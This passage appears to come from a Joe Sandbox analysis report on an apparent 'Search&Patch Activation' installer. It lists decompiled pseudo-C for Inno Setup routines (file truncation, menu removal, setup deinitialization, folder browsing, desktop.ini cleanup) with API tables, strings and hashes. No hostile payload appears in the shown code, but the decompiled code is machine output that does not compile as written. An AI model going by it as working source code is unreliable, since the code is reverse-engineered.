								if(SetFilePointer( *_t55, _t42 - _t54, 0, 2) + 1 == 0 || SetEndOfFile( *_t55) != 1) {
									goto L35;
								} else {
									goto L28;
								}
							}
							_t42 = _t42 + 1;
						}
						goto L28;
					}
				}
				_t48 = _t25 - 1;
				if(_t48 == 0) {
					_t26 = 0x40000000;
					_t51 = 1;
					_t50 = 2;
					L7:
					_t55[7] = E00404A7A;
					goto L8;
				}
				_t49 = _t48 - 1;
				if(_t49 == 0) {
					_t26 = 0xc0000000;
					_t51 = 1;
					_t50 = 3;
					goto L7;
				}
				return _t49;
			}

0x00404ac0
0x00404ac4
0x00404ac7
0x00404acd
0x00404ad2
0x00404adf
0x00404ae4
0x00404ae9
0x00404aee
0x00404b1e
0x00404b1e
0x00404b25
0x00404b30
0x00404be4
0x00404bf2
0x00404bfa
0x00404bf4
0x00404bfa
0x00404bfa
0x00404c02
0x00404c3f
0x00404c3f
0x00000000
0x00404c04
0x00404c04
0x00404c06
0x00404c0d
0x00404c26
0x00000000
0x00404c26
0x00404c11
0x00404c18
0x00404c2c
0x00404c31
0x00000000
0x00404c38
0x00404c1d
0x00404c1f
0x00404c1f
0x00000000
0x00404c1d
0x00404c02
0x00404b46
0x00404b4e
0x00000000
0x00000000
0x00404b54
0x00404b5d
0x00000000
0x00000000
0x00404b63
0x00404b6f
0x00404b70
0x00000000
0x00000000
0x00404b76
0x00404b7b
0x00404b7d
0x00404b7d
0x00404b8c
0x00000000
0x00404b92
0x00404ba7
0x00404bac
0x00404bae
0x00000000
0x00000000
0x00404bb4
0x00404bb6
0x00404bc2
0x00404bd6
0x00000000
0x00404be2
0x00000000
0x00404be2
0x00404bd6
0x00404bc4
0x00404bc4
0x00000000
0x00404bb6
0x00404b8c
0x00404ad4
0x00404ad5
0x00404af7
0x00404afc
0x00404b01
0x00404b17
0x00404b17
0x00000000
0x00404b17
0x00404ad7
0x00404ad8
0x00404b08
0x00404b0d
0x00404b12
0x00000000
0x00404b12
0x00000000

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
GetFileType.KERNEL32(?,000000F5), ref: 00404C11
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
GetLastError.KERNEL32(000000F5), ref: 00404C46

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00422678 Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422678(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x111)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x110) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x116)) != 1) {
							_t48 = GetSystemMenu(E00418670( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x111)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x110) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x110) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x0042267f
0x00422689
0x00422692
0x0042269c
0x004226a5
0x004226af
0x004226c8
0x004226d7
0x004226e1
0x004226ee
0x004226fb
0x00422708
0x00422715
0x00422722
0x00000000
0x0042272f
0x00422743
0x0042274d
0x0042274d
0x00422755
0x0042275f
0x00000000
0x00422769
0x0042275f
0x004226af
0x0042269c
0x00422770

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 004226C3
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004226E1
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004226EE
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004226FB
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422708
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422715
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422722
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042272F
EnableMenuItem.USER32 ref: 0042274D
EnableMenuItem.USER32 ref: 00422769

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: b633a805c3dfefc2d241534ae929bcf98399df6f62762c46efeb8f5b5c6a909e
Instruction ID: 3d3520f8b7ec6d74ae20e05d6755b86abcf69838e80cbfb0a1e170c33371412b
Opcode Fuzzy Hash: b633a805c3dfefc2d241534ae929bcf98399df6f62762c46efeb8f5b5c6a909e
Instruction Fuzzy Hash: 4F2124703447047AE720E725DD8BFAB7AD89B04B08F044065B6447F2D3C6F8EA40869C

Uniqueness

Uniqueness Score: -1.00%

Function 00483BEC Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00483BEC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr _t42;
				struct HWND__* _t51;
				struct HINSTANCE__* _t55;
				struct HINSTANCE__* _t57;
				intOrPtr _t59;
				intOrPtr* _t61;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr* _t68;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr _t77;
				intOrPtr _t83;
				intOrPtr _t85;
				void* _t89;
				void* _t91;
				void* _t92;
				intOrPtr _t108;
				void* _t111;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t118;
				void* _t123;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t146 = __fp0;
				_t119 = __edi;
				_t93 = __ecx;
				_t125 = _t126;
				_t127 = _t126 + 0xfffffff4;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t89 = __eax;
				_push(_t125);
				_push(0x483e51);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E004585A0("Deinitializing Setup.", __eax, __ecx, __edi, __esi);
				if( *0x49f490 != 0) {
					_t130 = _t89;
					if(_t89 != 0) {
						_push(_t125);
						_push(0x483c67);
						_push( *[fs:eax]);
						 *[fs:eax] = _t127;
						_t83 =  *0x49f488; // 0x0
						_v12 = 0;
						_v8 = 0xb;
						_t85 =  *0x49f490; // 0x23113e0
						 *0x49f488 = E00497CDC(_t85,  &_v12, "GetCustomSetupExitCode", _t130, __fp0, _t83, 0, 0);
						_pop(_t118);
						 *[fs:eax] = _t118;
					}
					_push(_t125);
					_push( *[fs:eax]);
					 *[fs:eax] = _t127;
					_v12 = 0;
					_v8 = 0xb;
					_t77 =  *0x49f490; // 0x23113e0
					E00497B58(_t77,  &_v12, "DeinitializeSetup", _t130, _t146, 0, 0);
					_pop(_t116);
					_t93 = 0x483cbe;
					 *[fs:eax] = _t116;
					E0042E814(0x49f490);
				}
				_t30 =  *0x49f46c; // 0x2252bec
				_t122 =  *((intOrPtr*)( *_t30 + 0x10))() - 1;
				if(_t122 >= 0) {
					_t123 = _t122 + 1;
					_t92 = 0;
					do {
						_t68 =  *0x49f46c; // 0x2252bec
						_t119 =  *_t68;
						 *((intOrPtr*)( *_t68 + 0xc))();
						_t71 =  *0x49f46c; // 0x2252bec
						_t93 =  *_t71;
						_t72 =  *((intOrPtr*)( *_t71 + 0x14))(_v16);
						_pop(_t114);
						E004530E0(_t72 & 0xffffff00 | _t72 != 0x00000000, _t114, _t72);
						_t92 = _t92 + 1;
						_t123 = _t123 - 1;
					} while (_t123 != 0);
				}
				_t32 =  *0x49f46c; // 0x2252bec
				 *((intOrPtr*)( *_t32 + 0x38))();
				_t34 =  *0x49f470; // 0x2252c18
				_t91 =  *((intOrPtr*)( *_t34 + 0x10))() - 1;
				if(_t91 >= 0) {
					do {
						_t61 =  *0x49f470; // 0x2252c18
						_t122 =  *_t61;
						 *((intOrPtr*)( *_t61 + 0xc))();
						_t64 =  *0x49f470; // 0x2252c18
						_t93 =  *_t64;
						_t65 =  *((intOrPtr*)( *_t64 + 0x14))(_v16);
						_pop(_t111);
						E004535E8(_t65 & 0xffffff00 | _t65 != 0x00000000, _t111, _t65);
						_t91 = _t91 - 1;
					} while (_t91 != 0xffffffff);
				}
				_t36 =  *0x49f470; // 0x2252c18
				_t107 =  *_t36;
				 *((intOrPtr*)( *_t36 + 0x38))();
				E0046EA64();
				if( *0x49f3f8 != 0) {
					_t59 =  *0x49f3fc; // 0x0
					 *0x49e844(_t59);
				}
				if( *0x49f514 != 0) {
					_t57 =  *0x49f514; // 0x0
					FreeLibrary(_t57);
				}
				if( *0x49f510 != 0) {
					_t55 =  *0x49f510; // 0x0
					FreeLibrary(_t55);
				}
				E0047F300();
				E0047EFD8(_t91, _t93, _t107, _t119, _t122);
				if( *0x49f44d != 0 &&  *0x49f010 != 0) {
					E004585A0("Not restarting Windows because Setup is being run from the debugger.", _t91, _t93, _t119, _t122);
					 *0x49f44d = 0;
				}
				E00457B24();
				_t42 =  *0x49e62c; // 0x2252410
				E0042EFE4( *((intOrPtr*)(_t42 + 0x20)));
				if( *0x49f44d != 0) {
					E004585A0("Restarting Windows.", _t91, _t93, _t119, _t122);
					if( *0x49f108 == 0) {
						E00481308(_t91, _t119, _t122);
					} else {
						_t51 =  *0x49f10c; // 0x303b2
						SendNotifyMessageA(_t51, 0x496, 0x2710, 0);
					}
				}
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(E00483E58);
				return E00403400( &_v16);
			}

0x00483bec
0x00483bec
0x00483bec
0x00483bed
0x00483bef
0x00483bf3
0x00483bf4
0x00483bf7
0x00483bfa
0x00483bfe
0x00483bff
0x00483c04
0x00483c07
0x00483c0f
0x00483c1b
0x00483c21
0x00483c23
0x00483c27
0x00483c28
0x00483c2d
0x00483c30
0x00483c37
0x00483c3f
0x00483c42
0x00483c4e
0x00483c58
0x00483c5f
0x00483c62
0x00483c62
0x00483c89
0x00483c8f
0x00483c92
0x00483c9b
0x00483c9e
0x00483caa
0x00483caf
0x00483cb6
0x00483cb8
0x00483cb9
0x00483ce3
0x00483ce3
0x00483ce8
0x00483cf4
0x00483cf7
0x00483cf9
0x00483cfa
0x00483cfc
0x00483d01
0x00483d06
0x00483d08
0x00483d11
0x00483d16
0x00483d18
0x00483d20
0x00483d21
0x00483d26
0x00483d27
0x00483d27
0x00483cfc
0x00483d2a
0x00483d31
0x00483d34
0x00483d40
0x00483d44
0x00483d46
0x00483d4b
0x00483d50
0x00483d52
0x00483d5b
0x00483d60
0x00483d62
0x00483d6a
0x00483d6b
0x00483d70
0x00483d71
0x00483d46
0x00483d76
0x00483d7b
0x00483d7d
0x00483d80
0x00483d8c
0x00483d8e
0x00483d94
0x00483d94
0x00483da1
0x00483da3
0x00483da9
0x00483da9
0x00483db5
0x00483db7
0x00483dbd
0x00483dbd
0x00483dc2
0x00483dc7
0x00483dd3
0x00483de3
0x00483de8
0x00483de8
0x00483def
0x00483df4
0x00483dfc
0x00483e08
0x00483e0f
0x00483e1b
0x00483e36
0x00483e1d
0x00483e29
0x00483e2f
0x00483e2f
0x00483e1b
0x00483e3d
0x00483e40
0x00483e43
0x00483e50

APIs

FreeLibrary.KERNEL32(00000000), ref: 00483DA9
FreeLibrary.KERNEL32(00000000), ref: 00483DBD
SendNotifyMessageA.USER32(000303B2,00000496,00002710,00000000), ref: 00483E2F

Strings

Not restarting Windows because Setup is being run from the debugger., xrefs: 00483DDE
DeinitializeSetup, xrefs: 00483CA5
Deinitializing Setup., xrefs: 00483C0A
Restarting Windows., xrefs: 00483E0A
GetCustomSetupExitCode, xrefs: 00483C49

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FreeLibrary$MessageNotifySend
String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 3817813901-1884538726
Opcode ID: 186ee2886046f9b43122ab043af96f7ec1ee3d20723b54ac4271aa589e2f1f9d
Instruction ID: eabafc25287b198f6322efd67ece7b763d9c4378165dc3fe8608e6ffeb49dec3
Opcode Fuzzy Hash: 186ee2886046f9b43122ab043af96f7ec1ee3d20723b54ac4271aa589e2f1f9d
Instruction Fuzzy Hash: 4451B030700240AFD710EF79D885B5E77E4EB29B09F50887BE800D72A1DB38AE49CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00462974 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00462974(void* __eax, void* __ebx, struct _browseinfo __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
				intOrPtr* _v8;
				char _v9;
				char _v16;
				char _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				struct _ITEMIDLIST* _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				char* _v56;
				struct _browseinfo _v64;
				char _v324;
				intOrPtr _t49;
				void* _t59;
				intOrPtr _t67;
				struct _browseinfo _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t68 = __edi;
				_t72 = _t73;
				_t74 = _t73 + 0xfffffdbc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t70 = __ecx;
				_v8 = __edx;
				_t59 = __eax;
				_push(_t72);
				_push(0x462b03);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v9 = 0;
				E0042D050( *_v8, __ecx,  &_v16, __eflags);
				_push( &_v20);
				L0042D13C();
				if(E0042D114( &_v20) != 0) {
					_v20 = 0;
				}
				E00402934( &_v64, 0x20);
				_v64 = _t70;
				_v56 =  &_v324;
				_v52 = E00403738(_t59);
				_v48 = 0x41;
				if(_a4 == 0) {
					_v48 = _v48 | 0x00000200;
				}
				_v44 = E00462910;
				if(_v16 != 0) {
					_v40 = E00403738(_v16);
				}
				_v24 = GetActiveWindow();
				_v28 = E0041F334(0, _t59, _t68, _t70);
				_push(0);
				L0042D0BC();
				_push(_t72);
				_push(0x462a78);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v32 = SHBrowseForFolder( &_v64);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x462a7f);
				L0042D0C4();
				E0041F3E8(_v28);
				_t49 =  *0x49e62c; // 0x2252410
				SetActiveWindow( *(_t49 + 0x20));
				return SetActiveWindow(_v24);
			}

0x00462974
0x00462975
0x00462977
0x0046297d
0x0046297e
0x0046297f
0x00462982
0x00462985
0x00462987
0x0046298a
0x0046298e
0x0046298f
0x00462994
0x00462997
0x0046299a
0x004629a6
0x004629ae
0x004629af
0x004629bb
0x004629bf
0x004629bf
0x004629cc
0x004629d1
0x004629da
0x004629e4
0x004629e7
0x004629f2
0x004629f4
0x004629f4
0x004629fb
0x00462a06
0x00462a10
0x00462a10
0x00462a18
0x00462a22
0x00462a25
0x00462a27
0x00462a2e
0x00462a2f
0x00462a34
0x00462a37
0x00462a43
0x00462a48
0x00462a4b
0x00462a4e
0x00462a53
0x00462a5b
0x00462a60
0x00462a69
0x00462a77

APIs

SHGetMalloc.SHELL32(?), ref: 004629AF
GetActiveWindow.USER32 ref: 00462A13
CoInitialize.OLE32(00000000), ref: 00462A27
SHBrowseForFolder.SHELL32(?), ref: 00462A3E
770EF460.OLE32(00462A7F,00000000,?,?,?,?,?,00000000,00462B03), ref: 00462A53
SetActiveWindow.USER32(?,00462A7F,00000000,?,?,?,?,?,00000000,00462B03), ref: 00462A69
SetActiveWindow.USER32(?,?,00462A7F,00000000,?,?,?,?,?,00000000,00462B03), ref: 00462A72

Strings

A, xrefs: 004629E7

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ActiveWindow$BrowseF460FolderInitializeMalloc
String ID: A
API String ID: 2191611128-3554254475
Opcode ID: 14be21f0889e27b63cff27c6b7920ac038a1d1e6a07f323e9ad5f5bcee8464c4
Instruction ID: 226cd12c2bf5eadadc06a8ace2d3cfe2a2dab59726cbcd1c1d639dda9b16e66d
Opcode Fuzzy Hash: 14be21f0889e27b63cff27c6b7920ac038a1d1e6a07f323e9ad5f5bcee8464c4
Instruction Fuzzy Hash: 2A3130B0E00208AFCB10EFB6D945A9EBBF8EB09304F51447AF414F7251E7789A04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00474358 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00474358(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				signed int _t38;
				intOrPtr _t45;
				CHAR* _t52;
				void* _t54;
				intOrPtr _t57;

				_push(0);
				_push(0);
				_push(0);
				_push(__edi);
				_t54 = __eax;
				_push(_t57);
				_push(0x474419);
				_push( *[fs:eax]);
				 *[fs:eax] = _t57;
				_t38 = GetFileAttributesA(E00403738(__eax));
				if(_t38 != 0xffffffff && (_t38 & 0x00000010) != 0) {
					E0042CA0C(_t54,  &_v8, "desktop.ini");
					E0042D224(".ShellClassInfo", _t38, 0, "CLSID2", __edi, _t54,  &_v12, _v8);
					if(E00406F54(_v12, "{0AFACED1-E828-11D1-9187-B532F1E9575D}") == 0) {
						E004073E0(_v8);
						E0042CA0C(_t54,  &_v16, "target.lnk");
						E004073E0(_v16);
						_t52 = E00403738(_t54);
						SetFileAttributesA(_t52, _t38 & 0xfffffffe);
						RemoveDirectoryA(_t52);
					}
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(0x474420);
				return E00403420( &_v16, 3);
			}

0x0047435b
0x0047435d
0x0047435f
0x00474363
0x00474364
0x00474368
0x00474369
0x0047436e
0x00474371
0x00474381
0x00474386
0x00474397
0x004743b0
0x004743c4
0x004743c9
0x004743d8
0x004743e0
0x004743f0
0x004743f3
0x004743f9
0x004743f9
0x004743c4
0x00474400
0x00474403
0x00474406
0x00474418

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00474419,?,?,?,00000008,00000000,00000000,00000000,?,00474675,?,?,00000000,004748F8), ref: 0047437C

Part of subcall function 0042D224: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042D29A

Part of subcall function 004073E0: DeleteFileA.KERNEL32(00000000,0049E62C,0049B575,00000000,0049B5CA,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 004073EB

SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00474419,?,?,?,00000008,00000000,00000000,00000000,?,00474675), ref: 004743F3
RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00474419,?,?,?,00000008,00000000,00000000,00000000), ref: 004743F9

Strings

CLSID2, xrefs: 004743A6
desktop.ini, xrefs: 00474390
{0AFACED1-E828-11D1-9187-B532F1E9575D}, xrefs: 004743B5
target.lnk, xrefs: 004743D1
.ShellClassInfo, xrefs: 004743AB

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
API String ID: 884541143-1710247218
Opcode ID: 147003ba7c3bbf40b2bfbdba997664b3f04ddcc797e79a53afdb41a85b012f1f
Instruction ID: 4e84a14b44ef1bdc1f764160ca150a50166b9b0d2b2f0232ddeafb405eb560a8
Opcode Fuzzy Hash: 147003ba7c3bbf40b2bfbdba997664b3f04ddcc797e79a53afdb41a85b012f1f
Instruction Fuzzy Hash: 2311C8307005147BD711E6659C82BAF73ADDB84758F60C17BF804A72C2DB3C9E02966D

Uniqueness

Uniqueness Score: -1.00%

Function 004190E4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004190E4(void* __eax) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				int _t15;
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t21;
				void* _t22;
				intOrPtr _t31;
				void* _t33;
				intOrPtr _t41;
				void* _t43;
				void* _t45;
				intOrPtr _t46;

				_t43 = _t45;
				_t46 = _t45 + 0xfffffff4;
				_t33 = __eax;
				if( *((short*)(__eax + 0x46)) == 0xffff) {
					return __eax;
				} else {
					_push(1);
					_push(1);
					_push(1);
					_push(GetSystemMetrics(0xe));
					_t15 = GetSystemMetrics(0xd);
					_push(_t15);
					L00410C68();
					_v8 = _t15;
					_push(_t43);
					_push(0x419198);
					_push( *[fs:eax]);
					 *[fs:eax] = _t46;
					_t17 =  *0x49e630; // 0x2250660
					_t18 = E004237FC(_t17,  *((short*)(_t33 + 0x46)));
					_t4 =  &_v8; // 0x49e62c
					E00410C88( *_t4, _t18);
					_t21 =  *0x49e630; // 0x2250660
					_t22 = E004237FC(_t21,  *((short*)(_t33 + 0x46)));
					_t6 =  &_v8; // 0x49e62c
					E00410C88( *_t6, _t22);
					_push(0);
					_push(0);
					_push(0);
					_t7 =  &_v8; // 0x49e62c
					_push( *_t7);
					L00410CBC();
					_push( &_v16);
					_push(0);
					L00410CCC();
					_push(_v12);
					_push(_v16);
					_push(1);
					_t11 =  &_v8; // 0x49e62c
					_push( *_t11);
					L00410CBC();
					_pop(_t41);
					 *[fs:eax] = _t41;
					_push(E0041919F);
					_t12 =  &_v8; // 0x49e62c
					_t31 =  *_t12;
					_push(_t31);
					L00410C70();
					return _t31;
				}
			}

0x004190e5
0x004190e7
0x004190eb
0x004190f2
0x004191a3
0x004190f8
0x004190f8
0x004190fa
0x004190fc
0x00419105
0x00419108
0x0041910d
0x0041910e
0x00419113
0x00419118
0x00419119
0x0041911e
0x00419121
0x00419128
0x0041912d
0x00419134
0x00419137
0x00419140
0x00419145
0x0041914c
0x0041914f
0x00419154
0x00419156
0x00419158
0x0041915a
0x0041915d
0x0041915e
0x00419166
0x00419167
0x00419169
0x00419171
0x00419175
0x00419176
0x00419178
0x0041917b
0x0041917c
0x00419183
0x00419186
0x00419189
0x0041918e
0x0041918e
0x00419191
0x00419192
0x00419197
0x00419197

APIs

GetSystemMetrics.USER32 ref: 00419100
GetSystemMetrics.USER32 ref: 00419108
6FAB7CB0.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 0041910E

Part of subcall function 00410C88: 6FAB0620.COMCTL32(,I,000000FF,00000000,0041913C,00000000,00419198,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00410C8C

6FB0BC60.COMCTL32(,I,00000000,00000000,00000000,00000000,00419198,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 0041915E
6FB0B6C0.COMCTL32(00000000,?,,I,00000000,00000000,00000000,00000000,00419198,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00419169
6FB0BC60.COMCTL32(,I,00000001,?,?,00000000,?,,I,00000000,00000000,00000000,00000000,00419198,?,00000000,0000000D,00000000), ref: 0041917C
6FAB7D50.COMCTL32(,I,0041919F,?,00000000,?,,I,00000000,00000000,00000000,00000000,00419198,?,00000000,0000000D,00000000,0000000E), ref: 00419192

Strings

,I, xrefs: 00419134, 0041914C, 0041915A, 00419178, 0041918E, 0041915D, 0041917B, 00419191

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
